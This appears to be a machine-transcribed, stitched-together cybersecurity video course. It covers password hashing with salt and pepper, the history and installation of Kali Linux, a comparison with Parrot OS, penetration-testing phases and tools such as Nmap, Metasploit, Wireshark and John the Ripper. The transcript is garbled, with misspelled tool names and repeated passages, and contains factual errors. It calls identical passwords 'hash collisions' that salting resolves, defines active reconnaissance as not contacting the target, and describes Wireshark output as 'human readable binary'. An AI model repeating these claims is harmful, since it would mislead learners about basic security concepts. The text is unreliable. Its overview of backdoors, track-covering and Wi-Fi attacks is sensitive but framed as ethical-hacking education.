easy to guess others are placed in order to preserve security in the long run the hash function must be quick enough to encrypt large amounts of data at a relatively fast pace but it also shouldn’t be very fast running the algorithm on all cylinders makes the functions easy to brute force and a security liability there must be a balance to allow the hash function to handle large amounts of data and not make it ridiculously easy to brute force by running through all the possible combinations the hash function must be dependent on each bit of the input the input can be text audio video or any other file extension if a single character is being changed it doesn’t matter how small that character may be the entire digest must have a distinctly different hash value this is essential to create unique digests for every password that is being stored but what if two different users are using the same password since the hash function is the same for all users both the digests will be the same this is called a hash collision you may think this must be a rare occasion where two users have exactly the same password but that is not the case we have techniques like salting that can be used to reduce these hash collisions as we will discuss later in this video you would be shocked to see the most used passwords of 2020 all of these passwords are laughably insecure and since many people use the same passwords repeatedly on different websites hash collisions risk are more common than one would expect let’s say the hash functions find two users having the same password how can they store both the hashes without messing up the original data this is where salting and peppering come to play salting is the process of adding a random keyword to the end of the input before it is passed on to the hash function this random keyword is unique for each user on the system and it is called the salt value or just the salt so even if two passwords are exactly the same the salt value will differ and so will their digest there is a small problem with this process though since the salt is unique for each user they need to be stored in the database along with the passwords and sometimes even in plain text to speed up the process of continuous verification if the server is hacked then the hashes will need to be brute forced which takes a lot of time but if they receive the salts as well the entire process becomes very fast this is something that peppering aims to solve peppering is the process of adding a random string of data to the input before passing them through the hash function but this time the random string is not unique for each user it is supposed to be common for all users in the database and the extra bit added is called the pepper in this case the pepper isn’t stored on the servers it is mostly hardcoded onto the website source code since it’s going to be the same for all credentials this way even if the servers get hacked they will not have the right pepper needed to crack into all the passwords many websites use a combination of salting and peppering to solve the problem of hash collision and bolster security since brute force takes such a long time many hackers avoid taking the effort the returns are mostly not worth it and the possible combinations of using both salting and peppering is humongous with cyber crime getting more and more complex by the day corporations are in the need of trained personnel in the field of cyber security ethical hacking and penetration testing had always been necessary for organizations and the general public to protect the system against malicious attackers however with the exponential growth in cyber attacks the necessity of being trained in ethical hacking is at an all-time high many such professionals tend to use Linux distributions for their penetration testing activities there are specific operating systems which are catered to ethical hackers these operating systems come pre-installed with the necessary tools and scripts required for ethical hacking probably the most famous operating system in this bracket is Kala Linux for today’s video we will learn about this distribution made by and for hackers we take you through the intricacies of its hardware and software specifications let’s take a look at the agenda for today we start by learning about Kali Linux and a basic explanation of its purpose we take a look at the history of Kali Linux from the story of its origin to its current day exploits next we learn a few distinct features of Kal Linux that make it an attractive choice for penetration testers worldwide moving on we take a look at the multiple ways we can install Kal Linux to start our journey in the world of penetration testing in the next few sections we compare it to an industry rival operating system by the name of Parrot Security operating system we take a look at the OS on a grassroots level next we learn about the standout features of Kali Linux and Parrot Security with their unique offerings we make a direct comparison between Kali and Parrot Security OS as far as their hardware specifications and allound usability is concerned we make a conclusion as to which operating system caters to which category of user in the next topic we take a detailed look at how we can install Kali Linux on a Windows 10 system using the VMware virtualization software moving on we go through some of the reasons why people should choose Kali Linux as their primary operating system when it comes to ethical hacking and penetration testing in the next

    section we cover the five different phases of penetration testing where each stage is a crucial segment in the entire cycle of a ethical hacking campaign we also take a look at the most popular tools installed in Kal Linux that are used regularly by ethical hackers as a part of their professional work coming to a few live demonstrations we start by learning some Linux terminal basic commands set up proxy chains to maintain a privacy on the internet run a few end mapap scans to find information about our victims use Wireshark to detect insecure browser traffic traveling through HTTP web pages learn about Metasloit and its components and finally use Metasloit to hack into a Windows 10 machine and grant ourselves root access or the admin access which basically gives us the key to the entire machine it’s no secret that the majority of our internet usage is at the risk of being hacked be it via unsafe messaging applications or misconfigured operating systems to counteract this void of digital security penetration testing has become the norm when it comes to vulnerability assessment kali Linux is an operating system that has become a well-known weapon in this fight against hackers a Linux distribution that is made specifically for penetration testers kali Linux has layers of features that we will be covering in today’s lesson let’s take a look at the topics to be covered in this video we start by learning about Kali Linux and a basic explanation of its purpose we take a look at the history of Kali Linux from the story of its origin to its current day exploits next we learn a few distinct features of Kali that make it an attractive choice for penetration testers worldwide finally we take a look at the multiple ways we can install Kali Linux to start our journey in the world of penetration testing let’s start by learning about Kali Linux in general Kali Linux which is formerly known as Backtrack Linux is an open-source Linux distribution aimed at advanced penetration testing and security auditing it contains several hundred tools that are targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering kal Linux is a multiple platform solution accessible and freely available to information security professionals and hobbyists among all the Linux distributions Kali Linux takes its roots from the Debian operating system debian has been a highly dependable and stable distribution for many years providing a similarly strong foundation to the Kali desktop while the operating system is capable of practically modifying every single part of our installation the networking components of Kali become disabled by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a deeper element of control to the most enthusiastic of users we did not get Kali Linux since the first day how did it come into existence let’s take a look at some of its history kal Linux is based on years of knowledge and experience in building penetration testing and operating systems during all these project lifelines there have been only a few different developers as the team has always been small the first project was called WPEX which stands for White Hat NPIX as can be inferred from the name it was based on the NPIX operating system as its underlying OS opix had releases ranging from version 2.0 to 2.7 this made way for the next project which was known as WAX or the long hand being White Hat Slack the name change was because the base OS was changed from NOPIX to Slack wax started at version 3 as a Nord it carrying on from WPIX there was a similar OS being produced at the same time auditor security collection often being shorted to just auditor which was once again using NOPIX its efforts were combined with wax to produce backtrack backtrack was based on slackware from version 1 to version 3 but switched to Ubuntu later on with version 4 to version 5 using the experience gained from all of this Kali Linux came after Backtrackk in 2013 kali started off using Debian stable as the engine under the hood before moving to Debian testing when Kali Linux became a rolling operating system now that we understand the history and the purpose of Kali Linux let us learn a little more about its distinct features the latest version of Kali comes with more than 600 penetration tools pre-installed after reviewing every tool that was included in Backtrack developers have eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality the Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external asset greatly reduces the risk of source contamination which can cause Kali Linux users worldwide a great deal of damage as a direct victim of cyber crime although penetration tools tend to be written in English the developers have ensured that Kali includes true multilingual support allowing more users to operate in their native language and locate the tools they need for the job the more comfortable a user feels with the intricacies of the operating system the easier it is to maintain a stronghold over the configuration and the device in general since ARMbased singleboard systems like the Raspberry Pi are becoming more and more prevalent and inexpensive the development team knew that Kali’s ARM support would need to be as robust as they could manage with fully working installations kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distributions so the tools for ARM are updated in conjunction with the rest of the distribution all this information is necessary for users to determine if Kal Linux is the correct choice for them if it is what are the ways that they can go forward with this installation and start their penetration testing journey the first way to use Kali Linux is by launching the distribution in the live USB mode this can be achieved by downloading the installer image file or the ISO file from the Kali Linux website and flashing it to a USB drive with a capacity of at least 8 GB some people don’t need to save the data permanently and a live USB is the perfect solution for such cases after the ISO image is flashed the thumb drive can be used to boot a fully working installation of the operating system with the caveat that any changes made to the OS in this mode are not written permanently some cases allow persistent usage in live USBs but those require further configuration than normal situations but what if the user wants to store data permanently in the installed OS the best and the most reliable way to ensure this is the full-fledged hard disk installation this will ensure the complete usage of the systems hardware capabilities and will take into account the updates and the configurations being made to the OS this method is supposed to override any pre-existing operating system installed on the computer be it Windows or any other variant of Linux the next alternative route for installing Kal Linux would be to use virtualization software such as VMware or Virtual Box the software will be installed as a separate application on an already existing OS and Kali Linux can be run as an operating system in the same computer as a window the hardware requirements will be completely customizable starting with the allotted RAM to the virtual hard capacity the usage of both a host and guest operating system like Kal Linux allows users a safe environment to learn while not putting their systems at risk if you want to learn more about how one can go forward with this method we have a dedicated video where Kali Linux is being installed on VMware while running on a Windows 10 operating system you can find the link in the description box to get started with your very own virtual machine the final way to install Kali Linux is by using a dual boot system to put it in simple words the Kali Linux OS will not be overwriting any pre-installed operating system on a machine but will be installed alongside it when a computer boots up the user will get a choice to boot into either of these operating systems many people prefer to keep both the Windows and Kali Linux installed so the distribution of work and recreational activities is also allotted effectively it gives users a safety valve should their custom Linux installation run into any bugs that cannot be fixed from within the operating system professionals in security testing penetration testing and ethical hacking utilize Linux as their preferred operating system provides several configurable distributions that Miu may configure based on your end use kali Linux and Parrot OS are two popular penetration testing distributions while these operating systems each have unique offerings the overall choice can differ between personnel thanks to their various tools and hardware specifications today we will look at both these distributions and settle on the perfect choice for each type of user let’s go through the agenda for this video we will learn about Kali Linux and pilot security OS from scratch while understanding their primary selling points as a Linux distribution catered towards penetration testers next we know about some features of these operating systems that stand out of their package finally we directly compare Kal Linux and Par security OS thereby making a clear-cut conclusion on which OS is perfect on a per requirement basis so let’s start by learning about Kal Linux from a ground level kal Linux which is formerly known as Backtrack Linux is an open-source Linux distribution aimed at advanced penetration testing and security auditing it contains several hundred tools targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering kali Linux is a multiplatform solution accessible and freely available to information security professionals and hobbyists among all the Linux distributions Kal Linux takes its roots from the Debian operating system debian has been a highly dependable and a stable distribution for many years providing a similarly strong foundation to the Kali Linux desktop while the operating system can practically modify every single part of our installation the networking components of Kali Linux come disabled by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a more profound element of security control to the most enthusiastic of users now let’s take a look at Parrot security operating system parrot Security OS is a Debian based Linux distribution with an emphasis on security privacy and development it is built on the Demian’s testing branch and uses a custom hardened Linux kernel parrot security contains several hundred tools targeted towards tasks such as penetration testing computer forensics reverse engineering and security research it is seen as a generally lightweight distribution that can work under rigorous hardware and software specifications it features a distinct forensics mode that does not mount any of the systems hard disks or partitions and has no influence on the host system making it much more stealthy than its regular occurrence this mode is used on the host system to execute forensic procedures a rolling release is a paradigm in which software upgrades are rolled out constantly rather than in batches of versions in software development this ensures that the software is constantly up to date a rolling release distribution such as pirate security OS follows the same concept it provides the most recent Linux kernel and software versions as soon as they become available with a basic introduction to the operating systems out of the way let us take a look at the unique features of both Kali Linux and Parrot Security OS the latest version of Kali Linux comes with more than 600 penetration tools pre-installed after reviewing every tool included in Backtrack developers have eliminated a significant number of tools that either simply did not work or duplicated other tools that provided the same and similar functionality the Kali Linux team comprises a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external assets dramatically reduces the risk of source contamination which can cause Kali Linux users worldwide a great deal of damage as a direct victim of cyber crime although penetration tools tend to be written in English the developers have ensured that Kali includes proper multilingual support allowing more users to operate in the native language and locate the tools they need for the job the more comfortable a user feels with the intricacies of the operating system the easier it is to maintain a stronghold over the configuration and the device in general since ARMbased single board systems like the Raspberry Pi are becoming more prevalent and inexpensive the development team knew that Kali’s ARM support would need to be as robust as they could manage with fully working installations kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution so the tools for ARM are updated in conjunction with the rest of the distribution let’s take a look at some of the features of Parrot Security operating system now along with a giant catalog of scripts Parrot Security OS has its own hardened Linux kernel modified explicitly to provide as much security and resistance to hackers as possible in the first line of defense the configurations in the operating system act as the second gateway taking care of malicious requests and dropping them off this is particularly beneficial since should there be a scenario where the latex Linux kernel is causing some particular issue the Parrot OS development team will most likely iron it out first before passing it on as an update if the custom hard kernel wasn’t recent enough PAR security developers managed to install more hacking tools and scripts to ensure a smooth transition for the Kali Linux users all the tools you find in Kali are present in parent to us and a few extra ones for good measure and this has been achieved while keeping roughly the same operating system size between both of them however it’s not all productivity points for parrot OS they provide a choice between two different desktop environments mate which comes pre-installed by default and KDE for those unfamiliar with Linux terminology you can think of desktop environments as the main UI for a distribution being highly modular in nature one can use parrot security OS while adding another desktop environment that they find appealing while Kal Linux has only a single option parrot security has provided two optimized builds with mate desktop and KD desktop one of the primary advantages of Parrot OS over Kali Linux is that it’s relatively lightweight this implies that it takes significantly less disk space and computing power to function correctly with as little as 320 MB of RAM required in reality Parrot OS is designed to operate successfully off a USB stick but Kali Linux does not work well from a USB Thrive and is generally installed in a virtual machine pirate OS is more of a niche distribution if you’re searching for something lighter than Kal Linux features are great but what about performance real world metrics let us compare both these operating systems directly with respect to their hardware specifications and usability in the end we can decide on what distribution is fit for each type of user for our first point of comparison let’s take a look at the RAM required for optimum performance of the operating system which is highly essential when trying to crack hashes or something of similar nature ram usage is a very important facet while Kali Linux demands at least 1 GB of RAM Paris security can operate optimally with a minimum of 320 MB of RAM for correctly displaying graphical elements kali Linux requires GPU based acceleration while this is not the case with parro security OS which doesn’t require any graphical acceleration needed from the user side once these operating systems are installed on VMware using the live boot ISOs they take up a minimum amount of hard disk storage both of these operating systems have a recommended disk storage of minimum of 20 GB in Kali Linux and a minimum of 15 GB in par security so they can install all the tools necessary in the ISO file when it comes to the category and the selection of tools Kal Linux has always been the first in securing every single tool available for hackers in the penetration testing industry parrot security on the other hand has managed to take it up a notch while specializing in wireless pen testing Parrot security makes it a point that all the tools that Kali Linux provides has been included in the ISO while simultaneously adding some extra tools that many users will have to install from third party sources in Kali Linux being a decade old penetration testing distribution Kali Linux has formed up a very big community with strong support signature parcurity on the other hand is still growing and it is garnering much more interest among veteran penetration testers and ethical hackers a primary drawback of Kal Linux is the extensive hardware requirement to perform optimally it requires higher memory than pyro security it also needs graphical acceleration while demanding more virtual hard disk storage parrot security on the other hand was initially designed to run off a USB drive directly thereby requiring very minimal requirements from a hardware perspective like just 320 MB of RAM and no graphical acceleration needed this means PAR security is much more feasible for people who are not able to devote massive resources to either their virtual machine or on their laptop hard disk directly with the comparison done between both of these operating systems let’s take a look at the type of users both of these are catered to one can go with Kala Linux if they want the extensive community support offered by its users if they want to go with a trusted development team that have been working on this distribution since many years if they have a powerful system which can run Kal Linux optimally without having to bottleneck performance and if they are comfortable with a semi-professional environment which may or may not be very useful for new beginners one can decide to go with parrot security if they want to go with a very lightweight and lean distribution that can run pretty much on all systems it also has a lot of tools pre-installed and some of them are not even present on Kal Linux it is much more suitable for underpowered rigs where users do not have a lot of hardware resources to provide to the operating system and thereby it is much more feasible for people with underpowered laptops or no graphical acceleration compared to Kal Linux Parc’s desktop environment is also relatively easier to use for new beginners for people who are just getting into ethical hacking Parent Security does a relatively better job of introducing them to the operating system and to the various tools without having to dump them into the entire intricacies the installation of Kali Linux there are multiple ways to install Kali Linux we can either install it on a normal hard drive in a virtual machine software such as VMware or Virtual Box or we can do that in hard bare metal machines now for the convenience of explanation we’re going to install Kali Linux today on a virtual machine software known as VMware vmware is able to run multiple operating systems on a single host machine which in our case is a Windows 10 system to get started with Kali Linux installation we have to go to the website to download an image file we go to get Kali and as you can see there are multiple platforms on which this operating system can be inverted as per our requirement we’re going to go with the virtual machine section as you can see it is already recommended by the developers this is the download button which will download a 64-bit ISO file we can download 32-bit but that is more necessary for hard metal machines or if you’re going to use it for older devices which do not support 64-bit operating systems yet after clicking on the download button we can see we have a vinro archive which will have the ISO files for now we have downloaded the ISO file and it is already present with me so we can start working on the VMware side of things once the ISO file is downloaded we open up VMware Workstation go to file and we create a new virtual machine in these two options it is highly recommended to go with the typical setup rather than the custom one the custom is much more advanced and requires much more information from the user which is beneficial for developers and people who are wellversed with virtualization software but for 90% of the cases typical setup will be enough here we can select the third option which will be I will install the operating system later in some operating systems we can use the ISO file here directly and VMware will install it for us but right now in the case of Kal Linux the third option is always the safest kal Linux is a Linux distribution so we can select Linux over here and the version as you can see here have multiple versions such as the multiple kernels every distribution has a a parent distribution for example Kal Linux has Debian and there are other distributions which are based or forked from some parent distribution kal Linux is based off of Debian so we can go with the highest version of Debian which is the Debian 10.x 64bit go next we can write any such name we can write Kal Linux so that it’ll be easier to recognize the virtual machine among this list of virtual machine instances the location can be any location you decide to put by default it should be the documents folder but anywhere you put it will hold up all the information regard the operating system all the files you download all the configurations you store everything will be stored in this particular location that you provide when we go next we are asked about the disk capacity this disk capacity will be all the storage that will be provided to your virtual machine of Kal Linux think of your Windows device if you have a 1 TB of hard drive you have the entirety of the hard disk to store data on how much data you give here you can only store up to that amount of data not to mention some amount of capacity will be taken up by the operating system itself to store its programs and applications for now we can give around let’s say 15 GB of information or if it recommended size for DBN is 20 we can just go ahead with 20 it depends all on the user case if you are going to use it extensively you can even go as high as 50 or 60 GB if you have plans to download many more applications and perform multiple different tests another option we get over here is storing virtual discs as a single file or storing them into multiple files as we already know this virtual machine run entirely on VMware sometimes when transferring these virtual machine instances let’s say from a personal computer to a work computer we’re going to need to copy up the entire folder that we had mentioned before over here instead all virtual machines have a portability feature now this portability feature is possible for all scenarios except it is much easier if the split the virtual disck into multiple files now even if this makes what porting virtual machines easier from either system to system or software to software let’s say if you want to switch from VMware to Virtual Box or vice versa the performance takes a small hit it’s not huge but it’s recommended to go with storing the virtual disc as a single file if you have no purposes of ever moving the virtual machine even if you do it’s not a complete stop that it cannot be ported it’s just easier when using multiple files but in order to get the best performance out of the virtual machine we can store it as a single file over here this is a summary of all the changes that we made and all the configurations that have been settled until now now at this point of time we have not provided the ISO file yet which is the installation file for the Kali Linux that we downloaded from this website as of right now we have only configured the settings of the virtual machine so we can press on finish and we have Kal Linux in the list now to make the changes further we press on edit virtual machine settings the memory is supposed to give the RAM of the virtual machine the devices with RAM of 8 GB or below that giving high amount of RAM will cause performance issues and the host system if the memory has some amount of free storage left let’s say on idle storage my Windows machine takes about 2GB so I have 6GB of memory to provide although if you provide all of the 6GB it will be much more difficult for the host system to run everything properly so for this instance we can keep it as 2GB of memory for the virtual machine instance similarly we can use the number of processors and we can customize it according to our liking let’s say if we want to use one processor but we want to use two different cores we can select them as well hard disk is preset up as the SCSI hard disk and it does not need to be changed for the installation of this operating system at all cdi DVD this is where the installation file comes you can think of the ISO file that we downloaded as a pen drive or a USB thumb drive which is necessary to install an operating system to provide this we’re going to select use ISO image file we’re going to click on browse going to go to downloads and select the IMO file over here select open and you can see it is already loaded up next in the network adapter it is recommended to use NAT this helps the virtual machine to draw the internet from the host machine settings if your host machine is connected to the internet then the virtual machine is connected as well there are some other options such as host only or custom segments or LAN segments but those are not necessary for installation rest of them are pretty standard which do not need any extra configuration and can be left as it is press okay and now we can power on this virtual machine in this screen we can choose how we want to proceed with the installation we have a start installer option over here so we’re going to press enter on that we’re going to wait for the things to load from the ISO file um the first step in the installation is choosing the language of the operating system for this we can go with English as standard this is a location this will be used for setting up the time and some of the internal settings which depend entirely on the location of the user so for this we’re going to go with India configuring the keyboard it’s always recommended to go with the American English first many people make a mistake of going with the Indian keyboard if it is possible and it provides a lot of issues later on so it’s always prefer to go with the American English and if later we see some necessity of another keyboard dialect that is ne required we can install it later but for now we should always stick with American English as a basic at this point it’s going to load the installation components from the ISO file it is a big file of 3.6GB so it has a lot of components that need to be put into the virtual machine which can also be used to detect hardware once the hardware and the network configuration is done by the ISO file we want to write a host name for the system this host name can be anything which is used to recognize this device on a local network or a LAN cable let’s say if we use the name Kali domain name you we can skip it for now it’s not necessary as such for the installation this is the full name for the user let’s say we can provide the name as simply learn as a full name next we’re going to set up a username this username is going to be necessary to identify the user from its root accounts and the subsequent below accounts for now we can give it as something as simply 1 2 3 now we have to choose a password for the user now remember since this is the first user that is being added onto this newly installed operating system it needs to be a password for the administrator we can use whichever password we like over here and use the same password below and press on continue at this point it’s going to detect on the components on which the operating system can be installed like here there are multiple options like the use entire disk use entire disk and setup LVM use entire disc and setup encrypted LVM for newcomers it is recommended to just use the first one since LVM encryption is something that you can learn afterwards when you’re much more hands-on with the Linux operating system for now we’re going to use the use entire disg guided installation and press on continue when we set up the virtual machine on VMware we had set up a disk capacity there we gave a propose 20 GB that is the hard disk which is being discovered here even though it is a virtual disk on VMware it acts as a normal hard disk on which an operating system can be installed so we select this one and press on continue here there is a multiple partition system all the operating systems that are installed have different components one is used for the keeping of the applications one for the files other for the RAM management and other things for newcomers it is always recommended to keep it in one partition and we’re going to select that and press on continue this is just an overview of the partition it’s going to make as you can see it has a primary partition of 20.4GB and a logical partition of 1 GB used for swap memory now these kind of naming can be confusing for people who are not well versed with Linux operating systems or in general virtualization but for now you can go ahead and press on continue as this will be fine we can press on finish partitioning and write changes to disk and continue it’s just a confirmation page as you can see that SCSI3 is our virtual hard disk of 20 GB disk capacity write the changes to the disk we press yes and click on continue at this point the installation has started now this installation will take a while depending on the num amount of RAM provided the processors provided and how quickly the performance of the system is being hampered by the host machine on quicker systems this will be rather quick while on the smaller ones this will take a while since this is going to take some time to install as it is being run on a virtual machine with only 2 GB of RAM we’re going to speed up this part of the video so we don’t have to waste any more time just watching the progress bar now that our core installation is completed it’s asking us to configure a package manager the work of a package manager on Linux operating system is similar to the Google Play Store on Android mobile devices and on the App Store for the Apple devices it’s an interface to install external applications which are not installed by default let’s say for Google Chrome or any other browser which can be used to browse the internet at this point of time it’s ask us to select a network mirror we’re going to select as yes and move forward with this next it’s going to ask us for a HTTP proxy which we can leave it as blank and press it as continue forward at this point of time it’s looking for updates to the Kali Linux installation this will fetch the new builds from the Kali server so the installation is always updated to the latest version now that the package manager is configured we have the grub bootloader the grub is used for selecting the operating system while booting up its core functionality is to allow the operating system to be loaded correctly without any faults so at this point of time if it asks install the grub boot loader to your primary dive we can select it as yes and press continue remember the installation was conducted on dev SDA so we’re going to select installation of the grub loader on the same hard disk that we have configured we press this one and press continue so now the grub boot loader is being installed the grub is highly essential because it it shows the motherboard where to start the operating system from even if the operating system is installed correctly and all the files are in correct order the absence of a bootloadader will not be able to launch the OS properly as you can see the installation is finally complete so now we can press on continue and it’s going to finalize the changes now you can see Kal Linux being booted up straight away it doesn’t check for the ISO file anymore since the operating system is now installed onto the virtual hard disk storage that we had configured before here we’re going to enter our username and password that we had set up before and we have the Kalinux system booted up and this is your homepage we can see the installed applications over here which are being used for penetration testing by multiple security analysts worldwide all of these come pre-installed with Kal Linux and others can be installed using the AP package manager that we had configured we can see a full name over here and with this our installation of the Kali Linux is complete it’s no secret that the vast bulk of our internet usage is vulnerable to hacking whether it’s through hazardous messaging apps or faulty operating systems penetration testing has become the norm for vulnerability assessment in order to fill this vacuum in digital security kali Linux is a well-known operating system in this fight against hackers kal Linux a distribution designed specifically for penetration testers has layers of features that we will go over in today’s lesson and take a look at some of the tools and features that the operating system has to offer let’s take a look at the videos topics and features that the operating system has to offer let’s take a look at the videos topics we start by learning the requirements of an operating system like Kali Linux we learn more about the core features of the OS and its intricacies moving on we take a look at the five distinct stages of penetration testing that dictate the flow of vulnerability assessment in general next we learn about some important tools that can be found on Kali Linux which are geared specifically for ethical hacking purposes and finally we have an extensive demonstration where we work on some basic terminal commands proxy tools and a couple of highly regarded software from the crux of the operating system let’s start by learning why one should learn Kali Linux in the first place in today’s world an organization’s most valuable asset is its information or data this is true for all kinds of businesses be it public or private on a daily basis they all deal with enormous amounts of sensitive information as a consequence terrorist groups hacking teams and cyber thieves often attack them to ensure the safety and protection businesses use a variety of security measures and regularly update their index organizations must be proactive in this age of digitalization by regularly assessing and updating their security everyday hackers discover new methods to breach firewalls ethical hackers or white hat hackers provide a fresh perspective on security they conduct penetration tests to validate security measures generally they will penetrate your networks and give you relevant information about your security posture once an organization has this knowledge it may upgrade its security procedures accordingly the latest version of Kallay Linux comes with more than 600 penetration tools pre-installed after reviewing every tool that was included in Backtrack developers have eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality occasionally when conducting penetration testing or hacking we must automate our activities since there may be hundreds of conditions and payloads to test and manually examining everything is timeconuming to improve our productivity we utilize tools that come prepackaged with Kali Linux these tools not only save us time but also accurately capture and process the data the Kylie Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external assets greatly reduces the risk of source contamination although penetration tools tend to be written in English the developers have ensured that Kali includes true multilingual support allowing more users to operate in the native language and locate the tools they need to do for the job since ARM based single board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive the development team knew that Kali’s ARM support would need to be as robust as they could manage with fully working installations kali Linux is available on a wide range of ARM devices and as ARM repositories integrated with the mainline distribution so tools for ARM are updated in conjunction with the rest of the distribution tools now that we understand the necessity for an operating system like Kali Linux let us take a look at some of its core features and offerings to the ethical hacking world kali Linux formerly known as Backtrack Linux is an open-source Linux distribution which is aimed at advanced penetration testing and security auditing it contains several hundred tools targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering kali Linux is a multiplatform solution accessible and freely available to information security professionals and hobbyists among all the Linux distributions Kali Linux takes its roots from the Debian operating system debian has been a highly dependable and stable distribution for many years providing a similarly strong foundation to the Kali Linux desktop while the operating system is capable of practically modifying every single part of our installation the networking components of Kali Linux come disabled by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a deeper element of security and control to the most enthusiastic of users let us now take a look at the five stages or phases of penetration testing this is the first stage of the penetration test which is known as the reconnaissance phase in this stage the security researcher collects information about the target it can be done actively which means you are collecting information without contacting the target or even both it helps security firms gather information about the target system network components active machines open ports and access points operating system details etc this activity can be performed by using information available in the public domain and using different tools the next phase is more tool oriented rather than performed manually and it is the scanning phase the penetration tester runs one or more scanner tools to gather more information about the target the penetration tester runs one or more scanner tools to gather information about the target by using various scanners such as war dialers port scanners network mappers and vulnerability scanners the tester collects as many vulnerabilities which help to turn an attack in a more sophisticated way the next stage is known as the gaining access phase in this phase the penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous stage exploitation may be buffer overflow attacks denial of service or DOS attacks session hijacking and many more basically penetration tester extracts information and sensitive data from servers by gaining access using different tools in the maintaining access phase the penetration tester tries to create a backdoor for himself it helps him to identify hidden vulnerabilities in the system and can later act as a gateway to retrieve control of the system in the final phase of covering tracks the penetration tester tries to remove all logs and footprints which help the administrator identify his presence this helps the tester to think like a hacker and perform corrective actions to mitigate those activities now that we understand the basics of penetration testing and how ethical hackers go about their way let us take a look at some notable tools which can be used on Kali Linux at the top of the chain lies NAPAP lmap is a free and open-source utility port scanner which can be used for network discovery and security auditing many systems and network administrators also find it useful for tasks such as network inventory managing service upgrade schedules and monitoring host or service uptime it is most beneficial in the early stages of ethical hacking that a hacker must figure the possible entry point to a system before running the necessary exploits thus allowing the hacker to leverage any insecure openings and breach the device it’s a part of the scanning phase of the penetration testing nap uses raw IP packets in novel ways to determine what hosts are available on the network what services these hosts are offering what operating systems they are running and their versions what type of packet filters and firewalls are in use and dozens of other characteristics it was designed to rapidly scan large networks but works fine against single hosts as well since every application that connects to a network needs to do so via a port the wrong port or server configuration can open a can of worms which lead to a thorough breach of the system and ultimately a fully hacked device next on the list we have metas-loit the metas-ploit framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systemic vulnerabilities on networks and servers as a part of the third stage of penetration testing it’s an open-source framework which can be easily customized and used with most operating systems with Metasloit the ethical hacking team can use a readymade or custom code and introduce it into a network to probe for weak spots as another flavor of threat hunting once these flaws are identified and documented the information can be used to address systemic weaknesses and prioritize solutions once a particular vulnerability is identified and the exploit is fed into the system there are a host of options for the hacker depending on the vulnerability hackers can even run root commands from the terminal allowing complete control over the activities of the compromised system as well as all personal data stored on the device a big advantage of metas-loit is the ability to run full-fledged scans on a target system thereby giving a detailed picture of the security index of said system this also provides the necessary exploits that can be used to bypass the firewalls and the anti virus software having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers as denoted by the high rank in this list at number three we have Wireshark wireshark is the world’s foremost and widely used networking protocol analyzer it lets you see what happening on your network at a microscopic level and is a de facto standard across many commercial and nonprofit enterprises government agencies and educational institutions wireshark is a popular open-source tool to capture network packets and converts them to human readable binary format it provides every single detail of the organization’s network infrastructure it consists of devices designed to help measure the ins and outs of the network the information collected through Wireshark can be used for various purposes such as realtime or offline network analysis identification of the traffic coming onto your network its frequency and its latency between specific hops this helps network administrators generate statistics based on realtime data wireshark is also a cross-platform tool that can be installed on Windows Linux and Mac systems to enable hackers on all ecosystems to monitor network traffic irrespective of the operating system the development team is determined to maintain this level of freedom for their users in the foreseeable future the next tool on our list is Air Garden which is a part of the third phase of penetration testing this is a multi-use bash script for Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts along with being able to launch denial of service attacks on compromised networks this multi-purpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking including multifps hacking modes all-in-one WP attack handshake file capturing evil twin attacks pixie dust and so much more it usually needs an external network adapter that supports monitor mode which is necessary to be able to capture wireless traffic traversing the air channels thanks to its open-source nature Air Garden can be used with multiple community plugins and add-ons thereby increasing its effectiveness against a wide variety of routers both in the 2.4 GHz band and 5 GHz band the next tool is John the Ripper john the Ripper is an open-source password security auditing and password recovery tool available for many operating systems john the Ripper Jumbo supports hundred of hash and cipher types including for user passwords of operating systems web apps groupware database servers network traffic captures encrypted private keys file systems and document files some of the key features of the tool include offering multiple modes to speed up password cracking automatically detecting the hashing algorithm used by the passwords and the ease of running and configuring the tool making it a password cracking script of choice for noviceses and professionals alike it can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources the word list being used in this dictionary attacks can be used from the users end allowing for a completely customizable process now that we have covered the basics of Kali Linux let us take a look at the agenda for our demo today we start out with a few terminal commands that are a basic part of a Linux operating system configure our own proxy chains to maintain anonymity while running penetration testing attacks on our victims next we run a few end mapap scans on a local Windows 10 machine to find out the type of information that can be gathered in such a scenario moving on we use Wireshark to monitor internet traffic and understand the importance of encryption and security when browsing the worldwide web next we learn about metas-ploit and its various applications in the line of vulnerability assessment of a device and finally we use metas-ploit to take root access of a fully updated Windows 10 computer system let’s begin with some terminal basics on Kali Linux when most people hear the term Linux they envision a complex operating system used only by programmers however the experience is not as frightening as it appears linux is an umbrella term for a collection of free and opensource Unix operating systems there are many variants like Ubuntu Fedora Debian these are distributions which is will be a more precise term when using a Linux operating system you will most likely utilize a shell which is a command line interface that provides access to the operating system services the majority of Linux distributions ship with a graphical user interface also known as GUI as their primary shell this is done to facilitate user interaction in the first place having said that a command line interface is suggested due to its increased power and effectiveness by entering the commands into the CLI tasks that require a multi-step GUI procedure may be completed in a matter of seconds we can start the terminal by clicking on the prompt icon here on top once the terminal is opened we can put up our commands the first command that we are going to look into is pwd pwd stands for present working directory as of right now what you’re seeing is the terminal window by default if I write pwd and press enter this 